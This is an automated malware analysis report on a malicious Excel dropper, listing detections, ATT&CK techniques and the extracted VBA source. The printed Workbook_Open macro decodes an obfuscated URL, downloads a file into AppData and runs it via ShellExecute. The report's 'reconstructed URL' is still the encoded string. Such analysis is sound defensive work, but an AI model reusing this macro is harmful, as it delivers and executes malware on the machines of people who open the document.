Office (OLE) malware analysis — malicious · ffa2f34eeebb71c1

MALICIOUS

Office (OLE)

147.5 KB Created: 2020-08-13 13:37:22 Authoring application: Microsoft Excel First seen: 2020-09-07

MD5: 77d87f15b1deaffc60a714178bff92e3 SHA-1: cbc7edd4b3d9ec8cb3a003d1641249e57320ec8d SHA-256: ffa2f34eeebb71c13d3a1eb8588dbf49475b64729a55aa1eac411af731c61242

276 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is an Excel document containing VBA macros, specifically a Workbook_Open macro. This macro utilizes URLDownloadToFile to download a payload from the reconstructed URL "http://fyf.xxdd/eqvujyjnfmjo/xxx00;tquui/fyf/`efohusfSF0iuvps0mq/{jc/eqvujyjnfmjo/xxx00;tquui" and saves it to the AppData directory as "Agent-9369223-0". The presence of ShellExecute API calls further indicates execution of downloaded content. The document body explicitly prompts the user to "Habilite el contenido para mostrar esta pantalla.", which is a common lure to enable macro execution.

Heuristics 8

ClamAV: Xls.Dropper.Agent-9369223-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-9369223-0
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA

Matched line in script

Private Declare PtrSafe Function DDBGe Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal lsWjjyCFxVleNvySvzNKt As Long, ByVal GggHPcEXDbtStEyQAWGRW As String, _
ByVal TfwKSTdBvYbHN As String, ByVal hpfKFGEJuBIY As Long, ByVal zzPFH As Long) As Long

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP = Environ$("AppData") & "\" & eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM

Reference to ShellExecute API high SC_STR_SHELLEXEC

Reference to ShellExecute API
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13452 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13452 bytes
SHA-256: `0daebabbfc8d649177f2f9ca4092a50dd112bd82200e84c811f3cf240f195011`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub Sib() End Sub Attribute VB_Name = "SiloHJbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Declare PtrSafe Function BIYzzPFHzYBg Lib "shell32.dll" Alias _ "ShellExecuteA" (ByVal zYBgeLAULCPbJIwwXgsUoT As Long, ByVal sJVJHBTQnWiokvMNjkuR As String, _ ByVal ycrXexFvbVWUZKE As String, ByVal LpQBRVXPpRwhdQm As String, ByVal cShrZZMzZwJXEVIMmZXRkh As String, ByVal DZyEALOezAKT As Long) As Long Private Declare PtrSafe Function DDBGe Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal lsWjjyCFxVleNvySvzNKt As Long, ByVal GggHPcEXDbtStEyQAWGRW As String, _ ByVal TfwKSTdBvYbHN As String, ByVal hpfKFGEJuBIY As Long, ByVal zzPFH As Long) As Long Sub MLoVnY() Dim BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn As String Dim eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM As String Dim CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP As String Dim cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui As String Dim QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc As String Dim DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD As String eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM = SRtVuPxW("fyf/xxdd") CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP = Environ$("AppData") & "\" & eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn = SRtVuPxW("fyf/`efohusfSF0iuvps0mq/{jc/eqvujyjnfmjo/xxx00;tquui") DDBGe 0, BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn, CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, 0, 0 BIYzzPFHzYBg 0, "open", CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, "", vbNullString, vbNormalFocus End Sub Sub Workbook_Open() MLoVnY End Sub Function rnIkDDisHp4e1dEwtDO8XRgW() As Currency Call t5IOznwCrl End Function Static Function t5IOznwCrl() As Integer Call Dp62rz6kt90kDRkudpcs1fW4 End Function Function Dp62rz6kt90kDRkudpcs1fW4() As Single Call Jb8AvPk2VR End Function Static Function Jb8AvPk2VR() As Date Call TJW8h3uwBHyE3XYkFXIADNkq End Function Function TJW8h3uwBHyE3XYkFXIADNkq() As Variant Call JxU0xFkI7x End Function Static Function JxU0xFkI7x() As Date Call rzGwrPUM9xS2rvCsRX6OdVek End Function Function rzGwrPUM9xS2rvCsRX6OdVek() As Variant Call hx2errEArb End Function Static Function hx2errEArb() As Double Call DlkYXBK4r3WCbBQoVfs4z78E End Function Function DlkYXBK4r3WCbBQoVfs4z78E() As Single Call FZ4yZPaWVH End Function Function SRtVuPxW(encv) Dim tRiy As String Dim IKGsottywfg As Double Dim kjJdix Dim AppData Dim Cntkbor Dim nt As Byte Dim Fh As Variant encv = StrReverse(encv) For Cntkbor = 1 To Len(encv) kjJdix = Mid(encv, Cntkbor, 1) tRiy = "" IKGsottywfg = 20 / 7 / 2290 nt = 1 Fh = 2 AppData = AppData & Chr(AscW(kjJdix) - 1) Next SRtVuPxW = AppData For nt = 1 To Len(enc) Next For Fh = 2 To Len(enc) Next End Function Function Jnfn(burgerorgan, bonusshoot) qoxnwkqnhfshhimr = "" & burgerorgan & "" Dim be3a8c1f30f1abadd648e22b16fdb57d5 As Double be3a8c1f30f1abadd648e22b16fdb57d7 = 642.162 Dim columnwall As Byte columnwall = 44414.429 Dim t0ea0a0840384a15e019665b2e996b73f As Long t0ea0a0840384a15e019665b2e996b73f = 564.954 Dim n2b549c2e42dc58d564726b5780212aza As Double n2b549c2e42dc58d564726b5780212aza = 895.115 dhmpmrvyvrxwv = vbNullString Dim m974e3e334b64ac13b6dec997fbabf21f As String m974e3e334b64ac13b6dec997fbabf21f = "naiveremove" Dim b08576ffe41cb67690655f1261f410844 As Byte b08576ffe41cb67690655f1261f410844 = 19.227 Dim z2c55929d38494d4bf3ab6ba3dd16305c As Boolean z2c55929d38494d4bf3ab6ba3dd16305c = 93.904 Dim b9d76f7072ca3da29e82e55579143fba0 As Double b9d76f7072ca3da29e82e55579143fba0 = 108.662 Dim kqeepfyakmzwuediw As Double kqeepfyakmzwuediw = 61.491 If kqeepfyakmzwuediw <> 189.252 Then Dim flamesight As Byte flamesight = 212.797 Dim sweartrust As Long sweartrust = 235.981 Dim prqhhqrabc As String prqhhqrabc = "fadzjgdilazu" End If End Function Function yujmngFXscDEwqazzd() As Long Call POLk00bh End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True ' Processing file: /tmp/qstore_8ch6tx6n ' =============================================================================== ' Module streams: ' _VBA_PROJECT_CUR/VBA/Module1 - 950 bytes ' Line #0: ' FuncDefn (Sub sJVJHBTQnWiokvMNjkuR()) ' Line #1: ' Line #2: ' EndSub ' _VBA_PROJECT_CUR/VBA/SiloHJbook - 9121 bytes ' Line #0: ' LineCont 0x0008 08 00 00 00 14 00 00 00 ' FuncDefn (Private Declare PtrSafe Function LpQBRVXPpRwhdQm Lib "TfwKSTdBvYbHN" (ByVal cShrZZMzZwJXEVIMmZXRkh As Long, ByVal DZyEALOezAKT As String, ByVal shell32.dll As String, ByVal DDBGe As String, ByVal lsWjjyCFxVleNvySvzNKt As String, ByVal GggHPcEXDbtStEyQAWGRW As Long) As Long) ' Line #1: ' Line #2: ' LineCont 0x0008 08 00 00 00 14 00 00 00 ' FuncDefn (Private Declare PtrSafe Function hpfKFGEJuBIY Lib "CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP" (ByVal zzPFH As Long, ByVal urlmon As String, ByVal MLoVnY As String, ByVal BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn As Long, ByVal eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM As Long) As Long) ' Line #3: ' Line #4: ' FuncDefn (Sub cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui()) ' Line #5: ' Dim ' VarDefn QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc (As String) ' Line #6: ' Line #7: ' Dim ' VarDefn DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD (As String) ' Line #8: ' Line #9: ' Dim ' VarDefn HJUgkOFL (As String) ' Line #10: ' Line #11: ' Dim ' VarDefn Environ (As String) ' Line #12: ' Line #13: ' Dim ' VarDefn vbNullString (As String) ' Line #14: ' Line #15: ' Dim ' VarDefn vbNormalFocus (As String) ' Line #16: ' Line #17: ' LitStr 0x0008 "fyf/xxdd" ' ArgsLd Fh 0x0001 ' St DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD ' Line #18: ' Line #19: ' LitStr 0x0007 "AppData" ' ArgsLd rnIkDDisHp4e1dEwtDO8XRgW$ 0x0001 ' LitStr 0x0001 "\" ' Concat ' Ld DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD ' Concat ' St HJUgkOFL ' Line #20: ' Line #21: ' Line #22: ' LitStr 0x0034 "fyf/`efohusfSF0iuvps0mq/{jc/eqvujyjnfmjo/xxx00;tquui" ' ArgsLd Fh 0x0001 ' St QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc ' Line #23: ' Line #24: ' LitDI2 0x0000 ' Ld QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc ' Ld HJUgkOFL ' LitDI2 0x0000 ' LitDI2 0x0000 ' ArgsCall hpfKFGEJuBIY 0x0005 ' Line #25: ' LitDI2 0x0000 ' LitStr 0x0004 "open" ' Ld HJUgkOFL ' LitStr 0x0000 "" ' Ld t5IOznwCrl ' Ld Dp62rz6kt90kDRkudpcs1fW4 ' ArgsCall LpQBRVXPpRwhdQm 0x0006 ' Line #26: ' EndSub ' Line #27: ' Line #28: ' FuncDefn (Sub Jb8AvPk2VR()) ' Line #29: ' Line #30: ' ArgsCall cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui 0x0000 ' Line #31: ' EndSub ' Line #32: ' Line #33: ' FuncDefn (Function TJW8h3uwBHyE3XYkFXIADNkq(id_FFFE As Currency) As Currency) ' Line #34: ' ArgsCall (Call) JxU0xFkI7x 0x0000 ' Line #35: ' EndFunc ' Line #36: ' FuncDefn (Static Function JxU0xFkI7x(id_FFFE As Integer) As Integer) ' Line #37: ' ArgsCall (Call) rzGwrPUM9xS2rvCsRX6OdVek 0x0000 ' Line #38: ' EndFunc ' Line #39: ' FuncDefn (Function rzGwrPUM9xS2rvCsRX6OdVek(id_FFFE As Single) As Single) ' Line #40: ' ArgsCall (Call) hx2errEArb 0x0000 ' Line #41: ' EndFunc ' Line #42: ' FuncDefn (Static Function hx2errEArb(id_FFFE As Date) As Date) ' Line #43: ' ArgsCall (Call) DlkYXBK4r3WCbBQoVfs4z78E 0x0000 ' Line #44: ' EndFunc ' Line #45: ' FuncDefn (Function DlkYXBK4r3WCbBQoVfs4z78E(id_FFFE As Variant) As Variant) ' Line #46: ' ArgsCall (Call) FZ4yZPaWVH 0x0000 ' Line #47: ' EndFunc ' Line #48: ' FuncDefn (Static Function FZ4yZPaWVH(id_FFFE As Date) As Date) ' Line #49: ' ArgsCall (Call) encv 0x0000 ' Line #50: ' EndFunc ' Line #51: ' FuncDefn (Function encv(id_FFFE As Variant) As Variant) ' Line #52: ' ArgsCall (Call) tTip 0x0000 ' Line #53: ' EndFunc ' Line #54: ' FuncDefn (Static Function tTip(id_FFFE As Double) As Double) ' Line #55: ' ArgsCall (Call) IKGcostIkfg 0x0000 ' Line #56: ' EndFunc ' Line #57: ' FuncDefn (Function IKGcostIkfg(id_FFFE As Single) As Single) ' Line #58: ' ArgsCall (Call) kjJdix 0x0000 ' Line #59: ' EndFunc ' Line #60: ' Line #61: ' FuncDefn (Function Fh(AppData, id_FFFE As Variant)) ' Line #62: ' Dim ' VarDefn nt (As String) ' Line #63: ' Dim ' VarDefn id_02CA (As Double) ' Line #64: ' Dim ' VarDefn Gh ' Line #65: ' Dim ' VarDefn StrReverse ' Line #66: ' Dim ' VarDefn id_02C8 ' Line #67: ' Dim ' VarDefn id_02CE (As Byte) ' Line #68: ' Dim ' VarDefn id_02CC (As Variant) ' Line #69: ' Ld AppData ' ArgsLd Jnfn 0x0001 ' St AppData ' Line #70: ' StartForVariable ' Ld id_02C8 ' EndForVariable ' LitDI2 0x0001 ' Ld AppData ' FnLen ' For ' Line #71: ' Ld AppData ' Ld id_02C8 ' LitDI2 0x0001 ' ArgsLd Mid 0x0003 ' St Gh ' Line #72: ' Line #73: ' LitStr 0x0000 "" ' St nt ' Line #74: ' LitDI2 0x0014 ' LitDI2 0x0007 ' Div ' LitDI2 0x08F2 ' Div ' St id_02CA ' Line #75: ' LitDI2 0x0001 ' St id_02CE ' Line #76: ' LitDI2 0x0002 ' St id_02CC ' Line #77: ' Ld StrReverse ' Ld Gh ' ArgsLd bonusshoot 0x0001 ' LitDI2 0x0001 ' Sub ' ArgsLd burgerorgan 0x0001 ' Concat ' St StrReverse ' Line #78: ' StartForVariable ' Next ' Line #79: ' Line #80: ' Ld StrReverse ' St Fh ' Line #81: ' Line #82: ' StartForVariable ' Ld id_02CE ' EndForVariable ' LitDI2 0x0001 ' Ld qoxnwkqnhfshhimr ' FnLen ' For ' Line #83: ' Line #84: ' StartForVariable ' Next ' Line #85: ' StartForVariable ' Ld id_02CC ' EndForVariable ' LitDI2 0x0002 ' Ld qoxnwkqnhfshhimr ' FnLen ' For ' Line #86: ' StartForVariable ' Next ' Line #87: ' EndFunc ' Line #88: ' Line #89: ' Line #90: ' FuncDefn (Function be3a8c1f30f1abadd648e22b16fdb57d5(be3a8c1f30f1abadd648e22b16fdb57d7, columnwall, id_FFFE As Variant)) ' Line #91: ' LitStr 0x0001 "" ' Ld be3a8c1f30f1abadd648e22b16fdb57d7 ' Concat ' LitStr 0x0001 "" ' Concat ' St t0ea0a0840384a15e019665b2e996b73f ' Line #92: ' Dim ' VarDefn n2b549c2e42dc58d564726b5780212aza (As Double) ' Line #93: ' LitR8 0xEF9E 0xC6A7 0x114B 0x4084 ' St dhmpmrvyvrxwv ' Line #94: ' Dim ' VarDefn m974e3e334b64ac13b6dec997fbabf21f (As Byte) ' Line #95: ' LitR8 0x353F 0xBA5E 0xAFCD 0x40E5 ' St m974e3e334b64ac13b6dec997fbabf21f ' Line #96: ' Dim ' VarDefn b08576ffe41cb67690655f1261f410844 (As Long) ' Line #97: ' LitR8 0x8312 0xCAC0 0xA7A1 0x4081 ' St b08576ffe41cb67690655f1261f410844 ' Line #98: ' Dim ' VarDefn z2c55929d38494d4bf3ab6ba3dd16305c (As Double) ' Line #99: ' LitR8 0xB852 0x851E 0xF8EB 0x408B ' St z2c55929d38494d4bf3ab6ba3dd16305c ' Line #100: ' Ld t5IOznwCrl ' St b9d76f7072ca3da29e82e55579143fba0 ' Line #101: ' Dim ' VarDefn kqeepfyakmzwuediw (As String) ' Line #102: ' LitStr 0x000B "naiveremove" ' St kqeepfyakmzwuediw ' Line #103: ' Dim ' VarDefn flamesight (As Byte) ' Line #104: ' LitR8 0x3127 0xAC08 0x3A1C 0x4033 ' St flamesight ' Line #105: ' Dim ' VarDefn sweartrust (As Boolean) ' Line #106: ' LitR8 0xE560 0x22D0 0x79DB 0x4057 ' St sweartrust ' Line #107: ' Dim ' VarDefn prqhhqrabc (As Double) ' Line #108: ' LitR8 0x7CEE 0x353F 0x2A5E 0x405B ' St prqhhqrabc ' Line #109: ' Dim ' VarDefn yujmngFXscDEwqazzd (As Double) ' Line #110: ' LitR8 0x2B02 0x1687 0xBED9 0x404E ' St yujmngFXscDEwqazzd ' Line #111: ' Ld yujmngFXscDEwqazzd ' LitR8 0xD2F2 0x624D 0xA810 0x4067 ' Ne ' IfBlock ' Line #112: ' Dim ' VarDefn POLk00bh (As Byte) ' Line #113: ' LitR8 0xDD2F 0x0624 0x9981 0x406A ' St POLk00bh ' Line #114: ' Dim ' VarDefn Sheet1 (As Long) ' Line #115: ' LitR8 0xAC08 0x5A1C 0x7F64 0x406D ' St Sheet1 ' Line #116: ' Dim ' VarDefn Sheet2 (As String) ' Line #117: ' LitStr 0x000C "fadzjgdilazu" ' St Sheet2 ' Line #118: ' EndIfBlock ' Line #119: ' EndFunc ' Line #120: ' Line #121: ' FuncDefn (Function Sheet3(id_FFFE As Long) As Long) ' Line #122: ' Line #123: ' ArgsCall (Call) Workbook 0x0000 ' Line #124: ' EndFunc ' Line #125: ' Line #126: ' _VBA_PROJECT_CUR/VBA/Sheet1 - 985 bytes ' _VBA_PROJECT_CUR/VBA/Sheet2 - 985 bytes ' _VBA_PROJECT_CUR/VBA/Sheet3 - 985 bytes

SHA-256: 0daebabbfc8d649177f2f9ca4092a50dd112bd82200e84c811f3cf240f195011

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Module1"
Sub Sib()

End Sub

Attribute VB_Name = "SiloHJbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare PtrSafe Function BIYzzPFHzYBg Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal zYBgeLAULCPbJIwwXgsUoT As Long, ByVal sJVJHBTQnWiokvMNjkuR As String, _
ByVal ycrXexFvbVWUZKE As String, ByVal LpQBRVXPpRwhdQm As String, ByVal cShrZZMzZwJXEVIMmZXRkh As String, ByVal DZyEALOezAKT As Long) As Long

Private Declare PtrSafe Function DDBGe Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal lsWjjyCFxVleNvySvzNKt As Long, ByVal GggHPcEXDbtStEyQAWGRW As String, _
ByVal TfwKSTdBvYbHN As String, ByVal hpfKFGEJuBIY As Long, ByVal zzPFH As Long) As Long

Sub MLoVnY()
Dim BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn As String

Dim eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM As String

Dim CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP As String

Dim cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui As String

Dim QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc As String

Dim DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD As String

eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM = SRtVuPxW("fyf/xxdd")

CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP = Environ$("AppData") & "\" & eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM


BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn = SRtVuPxW("fyf/`efohusfSF0iuvps0mq/{jc/eqvujyjnfmjo/xxx00;tquui")

DDBGe 0, BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn, CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, 0, 0
BIYzzPFHzYBg 0, "open", CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, "", vbNullString, vbNormalFocus
End Sub

Sub Workbook_Open()

MLoVnY
End Sub

Function rnIkDDisHp4e1dEwtDO8XRgW() As Currency
Call t5IOznwCrl
End Function
Static Function t5IOznwCrl() As Integer
Call Dp62rz6kt90kDRkudpcs1fW4
End Function
Function Dp62rz6kt90kDRkudpcs1fW4() As Single
Call Jb8AvPk2VR
End Function
Static Function Jb8AvPk2VR() As Date
Call TJW8h3uwBHyE3XYkFXIADNkq
End Function
Function TJW8h3uwBHyE3XYkFXIADNkq() As Variant
Call JxU0xFkI7x
End Function
Static Function JxU0xFkI7x() As Date
Call rzGwrPUM9xS2rvCsRX6OdVek
End Function
Function rzGwrPUM9xS2rvCsRX6OdVek() As Variant
Call hx2errEArb
End Function
Static Function hx2errEArb() As Double
Call DlkYXBK4r3WCbBQoVfs4z78E
End Function
Function DlkYXBK4r3WCbBQoVfs4z78E() As Single
Call FZ4yZPaWVH
End Function

Function SRtVuPxW(encv)
    Dim tRiy As String
    Dim IKGsottywfg As Double
    Dim kjJdix
    Dim AppData
    Dim Cntkbor
    Dim nt As Byte
    Dim Fh As Variant
    encv = StrReverse(encv)
    For Cntkbor = 1 To Len(encv)
        kjJdix = Mid(encv, Cntkbor, 1)
        
        tRiy = ""
        IKGsottywfg = 20 / 7 / 2290
        nt = 1
        Fh = 2
AppData = AppData & Chr(AscW(kjJdix) - 1)
    Next
 
SRtVuPxW = AppData

For nt = 1 To Len(enc)

Next
For Fh = 2 To Len(enc)
Next
End Function


Function Jnfn(burgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim be3a8c1f30f1abadd648e22b16fdb57d5 As Double
be3a8c1f30f1abadd648e22b16fdb57d7 = 642.162
Dim columnwall As Byte
columnwall = 44414.429
Dim t0ea0a0840384a15e019665b2e996b73f As Long
t0ea0a0840384a15e019665b2e996b73f = 564.954
Dim n2b549c2e42dc58d564726b5780212aza As Double
n2b549c2e42dc58d564726b5780212aza = 895.115
dhmpmrvyvrxwv = vbNullString
Dim m974e3e334b64ac13b6dec997fbabf21f As String
m974e3e334b64ac13b6dec997fbabf21f = "naiveremove"
Dim b08576ffe41cb67690655f1261f410844 As Byte
b08576ffe41cb67690655f1261f410844 = 19.227
Dim z2c55929d38494d4bf3ab6ba3dd16305c As Boolean
z2c55929d38494d4bf3ab6ba3dd16305c = 93.904
Dim b9d76f7072ca3da29e82e55579143fba0 As Double
b9d76f7072ca3da29e82e55579143fba0 = 108.662
Dim kqeepfyakmzwuediw As Double
kqeepfyakmzwuediw = 61.491
If kqeepfyakmzwuediw <> 189.252 Then
Dim flamesight As Byte
flamesight = 212.797
Dim sweartrust As Long
sweartrust = 235.981
Dim prqhhqrabc As String
prqhhqrabc = "fadzjgdilazu"
End If
End Function

Function yujmngFXscDEwqazzd() As Long

Call POLk00bh
End Function



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /tmp/qstore_8ch6tx6n
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 950 bytes
' Line #0:
' 	FuncDefn (Sub sJVJHBTQnWiokvMNjkuR())
' Line #1:
' Line #2:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/SiloHJbook - 9121 bytes
' Line #0:
' 	LineCont 0x0008 08 00 00 00 14 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function LpQBRVXPpRwhdQm Lib "TfwKSTdBvYbHN" (ByVal cShrZZMzZwJXEVIMmZXRkh As Long, ByVal DZyEALOezAKT As String, ByVal shell32.dll As String, ByVal DDBGe As String, ByVal lsWjjyCFxVleNvySvzNKt As String, ByVal GggHPcEXDbtStEyQAWGRW As Long) As Long)
' Line #1:
' Line #2:
' 	LineCont 0x0008 08 00 00 00 14 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function hpfKFGEJuBIY Lib "CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP" (ByVal zzPFH As Long, ByVal urlmon As String, ByVal MLoVnY As String, ByVal BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn As Long, ByVal eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM As Long) As Long)
' Line #3:
' Line #4:
' 	FuncDefn (Sub cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui())
' Line #5:
' 	Dim 
' 	VarDefn QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc (As String)
' Line #6:
' Line #7:
' 	Dim 
' 	VarDefn DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD (As String)
' Line #8:
' Line #9:
' 	Dim 
' 	VarDefn HJUgkOFL (As String)
' Line #10:
' Line #11:
' 	Dim 
' 	VarDefn Environ (As String)
' Line #12:
' Line #13:
' 	Dim 
' 	VarDefn vbNullString (As String)
' Line #14:
' Line #15:
' 	Dim 
' 	VarDefn vbNormalFocus (As String)
' Line #16:
' Line #17:
' 	LitStr 0x0008 "fyf/xxdd"
' 	ArgsLd Fh 0x0001 
' 	St DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD 
' Line #18:
' Line #19:
' 	LitStr 0x0007 "AppData"
' 	ArgsLd rnIkDDisHp4e1dEwtDO8XRgW$ 0x0001 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	Ld DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD 
' 	Concat 
' 	St HJUgkOFL 
' Line #20:
' Line #21:
' Line #22:
' 	LitStr 0x0034 "fyf/`efohusfSF0iuvps0mq/{jc/eqvujyjnfmjo/xxx00;tquui"
' 	ArgsLd Fh 0x0001 
' 	St QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc 
' Line #23:
' Line #24:
' 	LitDI2 0x0000 
' 	Ld QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc 
' 	Ld HJUgkOFL 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall hpfKFGEJuBIY 0x0005 
' Line #25:
' 	LitDI2 0x0000 
' 	LitStr 0x0004 "open"
' 	Ld HJUgkOFL 
' 	LitStr 0x0000 ""
' 	Ld t5IOznwCrl 
' 	Ld Dp62rz6kt90kDRkudpcs1fW4 
' 	ArgsCall LpQBRVXPpRwhdQm 0x0006 
' Line #26:
' 	EndSub 
' Line #27:
' Line #28:
' 	FuncDefn (Sub Jb8AvPk2VR())
' Line #29:
' Line #30:
' 	ArgsCall cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui 0x0000 
' Line #31:
' 	EndSub 
' Line #32:
' Line #33:
' 	FuncDefn (Function TJW8h3uwBHyE3XYkFXIADNkq(id_FFFE As Currency) As Currency)
' Line #34:
' 	ArgsCall (Call) JxU0xFkI7x 0x0000 
' Line #35:
' 	EndFunc 
' Line #36:
' 	FuncDefn (Static Function JxU0xFkI7x(id_FFFE As Integer) As Integer)
' Line #37:
